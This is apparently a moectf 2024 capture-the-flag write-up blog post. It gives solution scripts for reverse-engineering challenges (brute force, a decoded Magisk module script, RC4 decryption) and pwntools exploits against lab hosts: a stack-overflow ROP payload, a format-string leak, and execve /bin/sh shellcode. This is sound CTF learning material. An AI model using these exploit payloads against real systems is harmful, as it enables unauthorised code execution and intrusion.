    return 0;
}

Advanced Guide to Reverse Engineering

#include <iostream>
#include <cstring>

using namespace std;

int find(int i, unsigned int* arr) {
    for (int j = 33; j <= 126; j++)
        for (int k = 33; k <= 126; k++)
            for (int l = 33; l <= 126; l++)
                for (int m = 33; m <= 126; m++) {
                    unsigned char temp[] = { (unsigned char)j, (unsigned char)k, (unsigned char)l, (unsigned char)m };
                    unsigned int v;
                    memcpy(&v, temp, sizeof v); // read the four bytes as one 32-bit word (host byte order)
                    // + binds tighter than ^, so the two constants are summed before the XOR
                    if (((v * 0xccffbbbb + 0xdeadc0de) ^ (0xdeadbeef + 0xd3906)) == arr[i]) {
                        cout << (char)j << (char)k << (char)l << (char)m;
                        return 0;
                    }
                }
    return -1; // -1 means no matching character combination was found
}

int main() {
    unsigned int arr[] = {
        0xb5073388, 0xf58ea46f, 0x8cd2d760, 0x7fc56cda,
        0x52bc07da, 0x29054b48, 0x42d74750, 0x11297e95,
        0x5cf2821b, 0x747970da, 0x64793c81
    };

    for (int i = 0; i < 11; i++) {
        if (find(i, arr) == -1) {
            cout << "No match found for arr[" << i << "]\n";
        }
    }
    cout << endl;
    return 0;
}

SecretModule

Download the file, open it and look at customize.sh; it hints at base64. After decoding, download the file, which gives the following content:

testk() {
    echo "Welcome to the Secret module!But before you begin,you need to prove your self."
    (/system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events) || return 1
    return 0
}

choose() {
    while true; do
        /system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events
        if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUME >/dev/null`); then
            break
        fi
    done
    if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUMEUP >/dev/null`); then
        echo "114514"
    else
        echo "1919810"
    fi
}

if testk; then
    ui_print "Great! Now enter the secret."

else
    ui_print "Legacy Device. Use a newer device to do this challenge"
    exit
fi

concatenated=""

for i in 1 2 3 4 5 6 7
do
    result=$(choose)
    concatenated="${concatenated}${result}"
done

input_str=$(echo -n $concatenated | md5sum | awk '{print $1}')
sec="77a58d62b2c0870132bfe8e8ea3ad7f1"
if test $input_str = $sec
then
    echo 'You are right!Flag is'
    echo "moectf{$concatenated}"
else
    echo 'Wrong. Try again.'
    exit
fi

GPT, help me out: it wrote the decryption script.

import hashlib
import itertools

def md5_hash(s):
    return hashlib.md5(s.encode()).hexdigest()

# target hash value
target_hash = "77a58d62b2c0870132bfe8e8ea3ad7f1"

# the two possible outputs of choose()
options = ["114514", "1919810"]
# enumerate every combination: 7 positions, two choices each (2**7 = 128 candidates)
for combo in itertools.product(options, repeat=7):
    # join into one string
    concatenated = "".join(combo)
    # compute its MD5 hash
    hashed = md5_hash(concatenated)

    # stop when the hash matches the target
    if hashed == target_hash:
        print(f"找到匹配的输入序列: {combo}")
        print(f"输入字符串: {concatenated}")
        print(f"Flag 是: moectf{{{concatenated}}}")
        break

rc4

#include<stdio.h>
#include<string.h>
typedef unsigned long ULONG;
/* key-scheduling (initialisation) function */
void rc4_init(unsigned char*s, unsigned char*key, unsigned long Len)
{
    int i = 0, j = 0;
    unsigned char k[256] = { 0 }; /* unsigned, so j can never go negative */
    unsigned char tmp = 0;
    for (i = 0; i<256; i++)
    {
        s[i] = i;
        k[i] = key[i%Len];
    }
    for (i = 0; i<256; i++)
    {
        j = (j + s[i] + k[i]) % 256;
        tmp = s[i];
        s[i] = s[j]; /* swap s[i] and s[j] */
        s[j] = tmp;
    }
}
/* encryption and decryption (the same operation) */
void rc4_crypt(unsigned char*s, unsigned char*Data, unsigned long Len)
{
    int i = 0, j = 0, t = 0;
    unsigned long k = 0;
    unsigned char tmp;
    for (k = 0; k<Len; k++)
    {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j]; /* swap s[i] and s[j] */
        s[j] = tmp;
        t = (s[i] + s[j]) % 256;
        Data[k] ^= s[t];
    }
}

int main()
{
    unsigned char flag[]=
    {
        0xA7,0x1A,0x68,0xEC,0xD8,0x27,0x11,0xCC,0x8C,0x9B,0x16,0x15,0x5C,0xD2,0x67,0x3E,0x82,0xAD,0xCE,0x75,0xD4,
        0xBC,0x57,0x56,0xC2,0x8A,0x52,0xB8,0x6B,0xD6,0xCC,0xF8,0xA4,0xBA,0x72,0x2F,0xE0,0x57,0x15,0xB9,0x24,0x11
    };
    unsigned char key[]="RC4_1s_4w3s0m3";
    unsigned char s[256]={0};
    rc4_init(s,key,14);
    rc4_crypt(s,flag,42);
    int i;
    /* the buffer holds 42 bytes, so stop at index 41 */
    for(i=0;i<42;i++){
        printf("%c",flag[i]);
    }
    return 0;
}

Binary Vulnerability Auditing

Getting-Started Guide to Binary Vulnerability Auditing

Just connect with nc and it comes out.

NotEnoughTime

It's a math problem; write a script to interact with it.

from pwn import *
import re

def work(io):
    # initial interaction: send the setup values
    io.recvuntil(b"ones.")
    io.sendlineafter(b'=', b'2')
    io.sendlineafter(b'=', b'0')

    # move on to the arithmetic-expression part
    io.recvuntil(b'PREPARED!')
    a = io.recvuntil(b'=')

    # loop over the arithmetic expressions
    while True:
        # clean up the received expression: strip whitespace and '=', and use integer division
        aa = re.sub(r'[ \t\n\r=]+', '', a.decode()).replace('/', '//')

        # compute the result of the expression
        ans = eval(aa)
        print(f"Calculated Answer: {ans}")

        # send the result back to the server
        io.sendline(str(ans).encode())

        try:
            # receive the next expression
            a = io.recvuntil(b'=')
        except EOFError:
            # no more expressions: leave the loop
            break

# connect to the remote service
io = remote('192.168.114.1', 63631)

# run the worker function
work(io)

# stay interactive
io.interactive()

no_more_gets

from pwn import *

def exp(io):
    io.recvuntil(b'out.')  # receive up to the given string
    payload = b'A' * (0x50 + 0x8) + p64(0x40101a) + p64(0x401176)  # build the payload
    io.sendline(payload)  # send the payload

# use the correct IP address
io = remote('192.168.114.1', 63945)  # open the remote connection
exp(io)  # run the exp function
io.interactive()  # switch to interactive mode

leak_sth

from pwn import *
p=remote("192.168.114.1",56731)
payload=b"%7$p"
p.sendline(payload)
p.recvuntil(b"Your name:\n0x")
data=p.recv(8)
print("data=",data)
data=int(data,16)
print("data2=",hex(data))
p.sendline(str(data).encode())  # pwntools expects bytes on Python 3
p.interactive()

What is this? shellcode!

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p = remote('192.168.114.1',53436)

# bytes literal: pwntools sends raw bytes on Python 3
shellcode=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

p.send(shellcode)
p.interactive()

moectf2024
https://0ran9ewww.github.io/2024/10/12/moectf/moectf2024/
Author: orange
Published: October 12, 2024